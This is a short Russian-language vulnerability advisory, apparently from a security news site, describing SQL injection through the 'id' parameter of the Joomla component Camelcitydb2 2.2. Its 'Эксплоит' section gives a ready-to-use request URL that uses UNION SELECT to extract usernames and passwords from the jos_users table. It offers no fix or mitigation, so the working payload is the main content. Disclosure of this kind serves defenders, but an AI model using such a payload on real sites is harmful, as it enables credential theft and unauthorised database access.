• Партнер

  • Программа: Joomla Component Camelcitydb2 2.2

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
    команды в базе данных приложения. Уязвимость существует из-за недостаточной
    обработки входных данных в параметре «id» сценарием index.php. Удаленный
    пользователь может с помощью специально сформированного запроса выполнить
    произвольные SQL команды в базе данных приложения.

    Эксплоит:

    /index.php?option=com_camelcitydb2&id=[SQL]&view=detail&Itemid=15

    /index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии